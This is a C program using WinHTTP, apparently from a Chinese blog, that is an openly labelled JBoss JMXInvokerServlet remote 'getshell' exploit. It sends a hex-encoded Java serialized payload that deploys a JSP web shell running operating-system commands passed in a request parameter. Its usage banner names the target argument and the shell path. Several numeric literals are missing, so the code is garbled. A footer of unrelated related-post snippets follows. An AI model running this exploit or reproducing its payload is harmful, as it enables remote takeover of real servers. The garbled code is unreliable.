#include "stdafx.h"

#include <Windows.h>

#include <stdio.h>

#include <winhttp.h>

#include <comdef.h>

#pragma comment (lib,"Winhttp.lib")

char shell_invoke[] = (

    "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73" ///shellinvoker/shellinvoker.jsp

    "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"

    "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"

    "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"

    "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"

    "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"

    "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"

    "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"

    "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"

    "\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"

    "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"

    "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"

    "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"

    "\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"

    "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"

    "\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"

    "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"

    "\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"

    "\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"

    "\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"

    "\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"

    "\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"

    "\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"

    "\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"

    "\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"

    "\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"

    "\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"

    "\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"

    "\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"

    "\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"

    "\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"

    "\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"

    "\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"

    "\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"

    "\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"

    "\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"

    "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"

    "\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"

    "\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"

    "\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"

    "\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"

    "\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"

    "\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"

    "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"

    "\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"

    "\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"

    "\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"

    "\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"

    "\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"

    "\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"

    "\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"

    "\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"

    "\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"

    "\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"

    "\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"

    "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"

    "\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"

    "\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"

    "\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"

    "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"

    "\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"

    "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"

    "\x00\x04\x70\x78");

void request_https(wchar_t* Host,int port)

{

    DWORD dwSize = ;

    DWORD dwDownloaded = ;

    LPSTR pszOutBuffer;

    BOOL bResults = FALSE;

    HINTERNET hSession = NULL,

        hConnect = NULL,

        hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.

    hSession = WinHttpOpen( L"WinHTTP Example/1.0",

        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,

        WINHTTP_NO_PROXY_NAME,

        WINHTTP_NO_PROXY_BYPASS, );

    // Specify an HTTP server.

    if (hSession)

        hConnect = WinHttpConnect( hSession,Host,

        port, );

    // Create an HTTP request handle.

    if (hConnect)

        hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",

        NULL, WINHTTP_NO_REFERER,

        WINHTTP_DEFAULT_ACCEPT_TYPES,

        WINHTTP_FLAG_SECURE);

    DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |

        SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |

        SECURITY_FLAG_IGNORE_UNKNOWN_CA ;

    if( hRequest )

        bResults = WinHttpAddRequestHeaders( hRequest,

        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"

        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpAddRequestHeaders( hRequest,

        L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,

        (LPVOID)&options, sizeof (DWORD) );

    if(bResults == FALSE){

        printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld\n",GetLastError());

    }

    // Send a request.

    if (hRequest){

        bResults = WinHttpSendRequest( hRequest,

            WINHTTP_NO_ADDITIONAL_HEADERS, ,

            shell_invoke, WORD(sizeof(shell_invoke)),

            sizeof(shell_invoke), );

        if(bResults == FALSE)

            printf ("WinHttpSendRequest error: %ld\n",GetLastError());

    }

    if( hRequest ) WinHttpCloseHandle( hRequest );

    if( hConnect ) WinHttpCloseHandle( hConnect );

    if( hSession ) WinHttpCloseHandle( hSession );

}

void request_http(wchar_t* Host, int Port)

{

    DWORD dwSize = sizeof(DWORD);

    DWORD dwStatusCode = ;

    BOOL  bResults = FALSE;

    HINTERNET hSession = NULL,

    hConnect = NULL,

    hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.

    hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36",

        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,

        WINHTTP_NO_PROXY_NAME,

        WINHTTP_NO_PROXY_BYPASS,

         );

    // Specify an HTTP server.

    if( hSession )

        hConnect = WinHttpConnect( hSession,

        Host,

        Port,

         );

    // Create an HTTP Request handle.

    if( hConnect )

        hRequest = WinHttpOpenRequest( hConnect,

        L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet

        NULL,

        WINHTTP_NO_REFERER,

        WINHTTP_DEFAULT_ACCEPT_TYPES,

         );

    // Add a request header.

    if( hRequest )

        bResults = WinHttpAddRequestHeaders( hRequest,

        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"

        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

        bResults = WinHttpAddRequestHeaders( hRequest,

            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    // Send a Request.

    if( bResults )

        bResults = WinHttpSendRequest( hRequest,

        WINHTTP_NO_ADDITIONAL_HEADERS,

        ,

        shell_invoke,WORD(sizeof(shell_invoke)),

        sizeof(shell_invoke),

         );

    // Report any errors.

    if( !bResults )

        printf( "Error %d has occurred.\n", GetLastError( ) );

    // Close open handles.

    if( hRequest ) WinHttpCloseHandle( hRequest );

    if( hConnect ) WinHttpCloseHandle( hConnect );

    if( hSession ) WinHttpCloseHandle( hSession );

    //return 0;

}

int main(int argc, char* argv[])

{

    if (argc < )

    {

        printf("[*]:%s Jboss Exploit remote getshell\r\n",argv[]);

        printf("[*]:%s Remote_Host Remote_ip http/https \r\n",argv[]);

        printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp\r\n");

        return -;

    }

    wchar_t Host[MAX_PATH] = {};

    wchar_t procotol[MAX_PATH] = {};

    wsprintfW(Host, L"%S", argv[]);

    wsprintfW(procotol,L"%S",argv[]);

    printf("\r\n[*]:Host:%S procotol:%S \r\n", Host,procotol);

    if ( == lstrcmpi(procotol, L"http"))

    {

        request_http(Host,atoi(argv[]));

    }else if( == lstrcmpi(procotol, L"https"))

    {

        request_https(Host,atoi(argv[]));

    }else

    {

        printf("\r\nUnknown option.\r\n");

        return ;

    }

    return ;

}

Jboss remote getshell (JMXInvokerServlet) vc版的更多相关文章

  1. [原创]K8 Jboss jmx-console getshell exploit

    [原创]K8 Jboss jmx-console getshell exploit https://www.cnblogs.com/k8gege/p/10645858.html 0x00 前言 今天内 ...

  2. auto_ptr的VC版本源码剖析

    auto_ptr是当前C++标准库(STL)中提供的一种智能指针,包含于头文件 #include<memory> .auto_ptr 能够方便的管理单个堆内存对象,在你不用的时候自动帮你释 ...

  3. JBOSS invoker GETSHELL(PHP版)

    <?php $target = @$argv[1]; $procotol = @$argv[2]; if ($argc < 2) { print "[-]:php Jboss.p ...

  4. 【VC版】如何获取其他进程中ListView控件中的内容

    如果需要C#版的,可以看下我之前写的:C#如何获取其他程序ListView控件中的内容 获取其他进程的数据需要使用到以下几个函数: VirtualAllocEx() VirtualFreeEx() W ...

  5. VC版DoEvents

    VB和C#下有一个DoEvents方法,可以让程序在执行操作的同时仍可以处理其他事件.由于近期在做一个数据格式转换的项目,需要进行大批量的数据处理,希望能在进行数据读写过程中,程序还能接收其他操作,防 ...

  6. VC版超级记事本

    这是学习VC时的一个大作业,超级记事本.突然发现了,传上来供大家学习參考! 一.  功能需求: 1. 能在原有像记事本程序的基础上加入很多其它功能: 1).可以改变背景颜色. 2).可以改变字体颜色. ...

  7. VC版八皇后

    一.  功能需求: 1. 可以让玩家摆棋,并让电脑推断是否正确 2. 能让电脑给予帮助(给出全部可能结果) 3. 实现悔棋功能 4. 实现重置功能 5. 加入点按键音效果更佳 二.  整体设计计: 1 ...

  8. 【实战】JBOSS反序列化Getshell

    一.JBOSS4.0.5_GA,5.x,6.x 需要JavaDeserH2HC(https://github.com/joaomatosf/JavaDeserH2HC) 操作起来 javac -cp ...

  9. SendMessage发送自定义消息及消息响应(VC版)

    控件向父窗体发送自定义消息,父窗体定义处理此消息的函数  程序源代码(整个工程)下载:http://download.csdn.net/detail/qq2399431200/6274793 效果描述 ...

随机推荐

  1. codevs 必做:堆:1245、2879 并查集:1069、1074、1073

    1245 最小的N个和  时间限制: 1 s  空间限制: 128000 KB  题目等级 : 钻石 Diamond 题解  查看运行结果     题目描述 Description 有两个长度为 N ...

  2. C#窗体传值

    整理一下: 1.静态变量传值,非常简单适合简单的非实例的 public calss form1:Form{ public static int A; } public class form2:Form ...

  3. Python菜鸟之路:DOM基础

    前言 DOM 是 Document Object Model(文档对象模型)的缩写,定义了访问和操作 HTML 文档的标准方法.DOM把网页和脚本以及其他的编程语言联系了起来.DOM属于浏览器,而不是 ...

  4. js四则运算符

    只有当加法运算时,其中一方是字符串类型,就会把另一个也转为字符串类型.其他运算只要其中一方是数字,那么另一方就转为数字.并且加法运算会触发三种类型转换:将值转换为原始值,转换为数字,转换为字符串. & ...

  5. Nuxt使用scss

    Nuxt中使用scss也很简单,分简单的几步就OK 一.安装scss依赖 用IDE打开项目,在Terminal里通过 npm i node-sass sass-loader scss-loader - ...

  6. android studio 和gradle版本问题解决

    打开android studio 开始导入一个 covrdova项目 结果弹出一个这样的对话框意思是  "尚未配置此项目的 gradle" "是否希望项目使用gradle ...

  7. 006-MySQL中使用SHOW PROFILE命令分析性能

    一.概述 1.版本支持 Show profiles是5.0.37之后添加的,要想使用此功能,要确保版本在5.0.37之后. 查看数据库版本: Select version(); 2.查看开启关闭和默认 ...

  8. 如何删除github中的仓库?

    使用Github管理项目确实有些好处,但删除仓库(repositories)确实不太好找到. 首先进入要删除的仓库,点击右下角的“settings” 然后拉到页面最下面在danger zone 按“d ...

  9. CoreThink主题开发(八)使用H-ui开发博客主题之用户登录之前及登录之后

    感谢H-ui.感谢CoreThink! 效果图: 登录之后 登录窗体 想做登录之后的下拉菜单的,实在做不出来了,就一般显示了... 整个面包屑导航这里,先遍历模块,并且是允许前台显示的模块,之后就是判 ...

  10. LeetCode:平衡二叉树【110】

    LeetCode:平衡二叉树[110] 题目描述 给定一个二叉树,判断它是否是高度平衡的二叉树. 本题中,一棵高度平衡二叉树定义为: 一个二叉树每个节点 的左右两个子树的高度差的绝对值不超过1. 示例 ...